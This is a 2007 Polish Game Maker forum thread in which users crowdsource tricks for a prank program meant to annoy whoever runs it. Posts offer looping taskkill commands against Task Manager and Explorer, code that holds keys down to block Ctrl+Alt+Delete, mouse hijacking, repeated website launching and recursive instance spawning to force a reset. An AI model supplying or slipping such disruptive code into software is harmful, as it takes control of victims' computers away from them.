Snake Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Zrób żeby w kółko uruchamiał się ten proces z takimi parametrami: taskkill.exe /F /IM taskmgr.exe taskkill.exe /F /IM explorer.exe Wtedy będzie cool B) :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maxpayn Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 W step: speed = 40; direction += 8; W draw: window_set_mouse( x, y ); I teraz tylko podziwiać jak myszka trzaska kółeczka. :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Luz Opublikowano 30 Września 2007 Autor Udostępnij Opublikowano 30 Września 2007 Gdzie to mam bać w ste czy w create ?? Ale bedzie sie działo xD Maxpayn nie działa ten twuj kod chyba czegoś brakuje Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Ja jeszcze mam propozycję. z symuluj wciśnięcie klawisza shift, co uniemożliwi uruchomienie menadżera z klawiszy alr + ctr + delete xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Luz Opublikowano 30 Września 2007 Autor Udostępnij Opublikowano 30 Września 2007 Marek a jak to zrobic xD Bo ja niejestem specem :) Maxpayn powiedz dokładniej bo twuj kod nietyra Snake gdzie mam dać twuj kod ?? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maxpayn Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 W step: execute_program( "taskmgr.exe", 0, 0 ); execute_program( "taskkill.exe", 0, 0 ); Nie biorę za to odpowiedzialności. :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 keyboard_key_press(vk_shift ) Symuluje wciśnięcie klawisza o podanym kodzie. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Snake Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 @Luz: To nie jest kod. To przykład jak masz uruchomić aplikacje "taskkill". Tylko nie pamiętam czy GM może uruchamiać procesy z poleceniami :P Wklej jedną linijkę do MENU START>URUCHOM to zobaczysz jak to działa. :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maxpayn Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Marek.S to będzie dobre bo ten klawisz się wciśnie a nie zostanie wypuszczony czyli cały czas będzie wciśnięty, nawet po wyłączeniu programu. :P W step: execute_shell( 'www.cipy.pl', 0 ); window_mouse_set( random( 3000 ), random( 3000 ) ); Nie no to już przerasta wszystko xD. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Luz Opublikowano 30 Września 2007 Autor Udostępnij Opublikowano 30 Września 2007 wow maxpayn ten twuj ostatni kod jest dobry już dostałem nerwicy :) jest tylko mały problem cd-rom się nieotwiera ale zato 1000razy właącza sie stronka xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 ej po cholerę robić jakieś bezużyteczne gówno, nikt z tego nie skorzysta a Ty nie potrafisz nawet tego dziadostwa zrobić i dalej się w takim szajsie zagłębiasz lepiej mogłeś dać trojana spakowanego byłoby to więcej warte u poracha ........ jeden Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Webzir Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Coś irytującego? Głośna przesterowana muzyczka :D Z jakimiś szmerami na linii naturalnie. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Luz Opublikowano 30 Września 2007 Autor Udostępnij Opublikowano 30 Września 2007 Maxpayn mam taka rozrube żo wow zaras dam link xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maxpayn Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Maxpayn mam taka rozrube żo wow zaras dam link xD Niestety nie uruchomię tego, bo wiem co mnie będzie czekać. xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Snake Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Luz, wsadź tą muzyczkę do tego shita: http://www.youtube.com/watch?v=_G_QpxZ-ShA :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Luz Opublikowano 30 Września 2007 Autor Udostępnij Opublikowano 30 Września 2007 Ok ale teraz to poprostu nic wam niepomoze oprucz reseta xD Ej snake zepsuł mi sie mikrofon i nie mam jak tego nagrac :( Ludzie jak ktos ma dobry mikrofon nagrajcie i przeslijcie muzyke z linku snake pliska :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 co za filozofia wystarczy dać w step instance_create a w nich jeszcze raz instance_create i resetujcie sobie kompy... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maxpayn Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 co za filozofia wystarczy dać w step instance_create a w nich jeszcze raz instance_create i resetujcie sobie kompy... A tam, wciskasz ctrl+alt+delete, i po kłopocie. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 a czemu nie repeat (10) {instance_create(x,y,obiekt} <devil> Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maxpayn Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Polecam dodać: keyboard_key_press( vk_up ); Bo jak naciśniesz ctrl+alt+delete to można jeszcze strzałkami nakierować i wyłączyć deletem. :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Nx Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Zawsze mogę pomuć przy tworzeniu programu :D execute_shell( 'www.cipy.pl', 0 ); Holera jaką ty stronę dałes weszłem xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Snake Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Ok ale teraz to poprostu nic wam niepomoze oprucz reseta xD Ej snake zepsuł mi sie mikrofon i nie mam jak tego nagrac :( Ludzie jak ktos ma dobry mikrofon nagrajcie i przeslijcie muzyke z linku snake pliska :) Masz: https://gmclan.org/up541_8_spongebob_square...__tiny_tim.html :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Misiek999 Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 mozna dac rowniez : window_set_visible(0) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Luz Opublikowano 30 Września 2007 Autor Udostępnij Opublikowano 30 Września 2007 Ludzie mam problem bo jak dałem wszystkie to opcje to co jedna zasłania druga :( CD-rom sie nie otwiera bo net się włącza myszka nieświruje bo muzyka gra jak zrobić by wszystko sie działo naraż powie ktos ?? Chyba, że ktos sie poświęci i wezmie odemnie ten program i go troszke pod tuninguje :) I specjalnie powtarzam aby nie było nie podpisze się pod tym sam. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Wal do mnie z projektem ;) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 wywal to do kosza nic nie zrobiłeś, nic nie wniosłeś na gmclan i będę tu marudzić aż do zrzygania, daj mi projekt a ja go w.... :angry: Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Sylwester Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 wywal to do kosza nic nie zrobiłeś, nic nie wniosłeś na gmclan i będę tu marudzić aż do zrzygania, daj mi projekt a ja go w.... się odezwał... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Luz Opublikowano 30 Września 2007 Autor Udostępnij Opublikowano 30 Września 2007 Spoko ziom nie chcesz to nie czytaj, ale tej pracy nie wywale szkoda mi wysiłku swojego i innych ludzi z gmclanu bo wszyscy tutaj zgromadzeni jesteśmy twurcami tego dzieła :) A co do tego, że nic nie wniosłem to mam zamiar ten program wstawić równiez w wersji projektu aby poczatkujący mogli sie z niego pouczyc, albo poprzerabiac . Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Misiek999 Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 no faktycznie wszyscy sie tu wysilili zeby Ci napisac te skrypty :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 30 Września 2007 Udostępnij Opublikowano 30 Września 2007 Spoko ziom niechcesz to nieczytaj, ale tej pracy nie wywale szkoda mi wysiłku swojego i innych ludzi z gmclanu bo wszyscy tutaj zgromadzeni jesteśmy twurcami tego dzieła :) ten Twój program jest nic nie warty, moge zrobic taki w 5 minut ale szkoda 5 minut na dno... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi